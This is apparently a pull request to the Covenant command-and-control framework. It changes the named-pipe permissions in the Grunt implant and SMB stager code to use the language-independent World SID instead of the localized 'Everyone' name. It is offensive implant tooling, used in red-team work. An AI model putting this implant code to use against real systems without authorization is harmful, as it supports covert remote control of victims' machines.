### PR TITLE
Replace 'Everyone' by SID in SMB pipes' permission

### DIFF
--- a/Covenant/Data/Grunt/GruntBridge/GruntBridge.cs
+++ b/Covenant/Data/Grunt/GruntBridge/GruntBridge.cs
@@ -432,7 +432,8 @@ namespace GruntExecutor
                     try
                     {
                         PipeSecurity ps = new PipeSecurity();
-                        ps.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
+                        System.Security.Principal.SecurityIdentifier sid = new System.Security.Principal.SecurityIdentifier(System.Security.Principal.WellKnownSidType.WorldSid, null);
+                        ps.AddAccessRule(new PipeAccessRule(sid, PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
                         NamedPipeServerStream newServerPipe = new NamedPipeServerStream(this.PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
                         newServerPipe.WaitForConnection();
                         lock (this._WritePipeLock)

--- a/Covenant/Data/Grunt/GruntHTTP/GruntHTTP.cs
+++ b/Covenant/Data/Grunt/GruntHTTP/GruntHTTP.cs
@@ -444,7 +444,8 @@ namespace GruntExecutor
                     try
                     {
                         PipeSecurity ps = new PipeSecurity();
-                        ps.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
+                        System.Security.Principal.SecurityIdentifier sid = new System.Security.Principal.SecurityIdentifier(System.Security.Principal.WellKnownSidType.WorldSid, null);
+                        ps.AddAccessRule(new PipeAccessRule(sid, PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
                         NamedPipeServerStream newServerPipe = new NamedPipeServerStream(this.PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
                         newServerPipe.WaitForConnection();
                         lock (this._WritePipeLock)

--- a/Covenant/Data/Grunt/GruntSMB/GruntSMB.cs
+++ b/Covenant/Data/Grunt/GruntSMB/GruntSMB.cs
@@ -438,7 +438,8 @@ namespace GruntExecutor
                     try
                     {
                         PipeSecurity ps = new PipeSecurity();
-                        ps.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
+                        System.Security.Principal.SecurityIdentifier sid = new System.Security.Principal.SecurityIdentifier(System.Security.Principal.WellKnownSidType.WorldSid, null);
+                        ps.AddAccessRule(new PipeAccessRule(sid, PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
                         NamedPipeServerStream newServerPipe = new NamedPipeServerStream(this.PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
                         newServerPipe.WaitForConnection();
                         lock (this._WritePipeLock)

--- a/Covenant/Data/Grunt/GruntSMB/GruntSMBStager.cs
+++ b/Covenant/Data/Grunt/GruntSMB/GruntSMBStager.cs
@@ -57,7 +57,8 @@ namespace GruntStager
                 NamedPipeServerStream pipe = null;
                 string Stage0Response = "";
                 PipeSecurity ps = new PipeSecurity();
-                ps.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
+                System.Security.Principal.SecurityIdentifier sid = new System.Security.Principal.SecurityIdentifier(System.Security.Principal.WellKnownSidType.WorldSid, null);
+                ps.AddAccessRule(new PipeAccessRule(sid, PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow));
                 pipe = new NamedPipeServerStream(PipeName, PipeDirection.InOut, NamedPipeServerStream.MaxAllowedServerInstances, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 1024, 1024, ps);
                 pipe.WaitForConnection();
                 System.Threading.Thread.Sleep(5000);


### PR DESCRIPTION
Replaces the localized group name "Everyone" in SMB pipes' permission by the corresponding Security Identifier in order to be independent of the system language.